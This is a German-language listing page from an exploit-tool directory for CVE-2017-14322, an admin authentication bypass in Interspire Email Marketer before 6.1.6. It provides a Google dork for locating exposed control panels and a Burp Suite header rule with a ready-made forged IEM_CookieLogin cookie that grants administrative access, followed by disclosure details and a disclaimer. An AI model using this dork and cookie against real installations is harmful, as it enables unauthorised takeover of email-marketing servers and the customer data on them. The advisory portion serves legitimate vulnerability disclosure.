Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-14322 — CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit | Kitploit
Tools/GitHubGitHub/joesmithjaffa/cve-2017-14322
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubjoesmithjaffa/cve-2017-14322

CVE-2017-14322

CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit

Repository anzeigen
51vor 8 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-14322 Interspire Email Marketer (emailmarketer) Exploit

Google Dork

root@kitploit:~
intitle:"Control Panel" + emailmarketer

Exploit mittels Burp Suit

Fügen Sie eine Match-and-Replace-Regel für den Request-Header wie unten hinzu:

root@kitploit:~
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D

Wenn Sie die Seite öffnen, funktioniert es beim ersten Mal nicht, da der Cookie-Header nicht vorhanden ist. Aktualisieren Sie die Seite ein zweites Mal mit dem Burp-Proxy und der oben hinzugefügten Regel, und Sie werden sehen, was Sie wollten. Stellen Sie sicher, dass Sie "Intercept Client Requests" aktivieren.

Titel:

Interspire Email Marketer - Remote Admin Authentication Bypass

Autor:

Hakan Küsne, Infoteam Security (CH)

CVE-ID:

CVE-2017-14322

Risikoinformationen:

CVSS Base Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O

Zeitplan:

2017-09-12 Schwachstelle entdeckt 2017-09-12 Hersteller hat die Schwachstelle bereits behoben, aber nie an Kunden kommuniziert, sodass Hunderte in freier Wildbahn verwundbar blieben 2017-10-17 Öffentliche Offenlegung

Betroffene Produkte:

Interspire Email Marketer vor Version 6.1.6

Hersteller-Webseite:

http://www.interspire.com/emailmarketer/

Details:

Die Funktion zur Überprüfung, ob der Benutzer bereits eingeloggt ist, init.php in Interspire Email Marketer (IEM) vor 6.1.6 ermöglicht es entfernten Angreifern, die Authentifizierung zu umgehen und administrativen Zugriff zu erlangen, indem sie das Cookie IEM_CookieLogin mit einem speziell präparierten Wert verwenden. Darüber hinaus, wenn der Kunde keinen jährlichen Wartungsvertrag hat, gibt die Anwendung an, dass sie die letzte verfügbare Version sei und es kein Update gebe.

Die Schwachstellen wurden während einer Incident-Response auf einer kompromittierten Instanz der Anwendung entdeckt.

Proof of Concept:

Details hier bereitgestellt: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html

Behebung:

Der Hersteller hat die Schwachstelle in Version 6.1.6 behoben, aber seine Kunden nie spezifisch darüber informiert.

Hinweis:

Dieser Exploit dient nur zu Bildungszwecken und übernimmt keine Verantwortung für Ihre eigenen Handlungen.

Tool herunterladen